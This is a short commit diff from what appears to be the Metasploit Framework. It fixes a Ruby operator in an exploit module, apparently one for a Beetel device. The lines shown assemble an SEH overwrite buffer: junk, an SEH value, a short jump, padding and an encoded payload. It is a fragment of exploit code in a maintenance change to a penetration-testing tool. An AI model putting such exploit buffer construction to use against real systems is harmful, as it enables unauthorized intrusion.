Land #10749, Ruby shovel operator fix for Beetel
commit
8620ce0ed1
|
@ -70,6 +70,6 @@ class MetasploitModule < Msf::Exploit
|
||||||
jump = Rex::Arch::X86.jmp_short(66)
|
jump = Rex::Arch::X86.jmp_short(66)
|
||||||
padding = rand_text(66) # Pad past buffer corruption
|
padding = rand_text(66) # Pad past buffer corruption
|
||||||
|
|
||||||
junk << seh << jump << padding << payload.encoded
|
junk + seh + jump + padding + payload.encoded
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue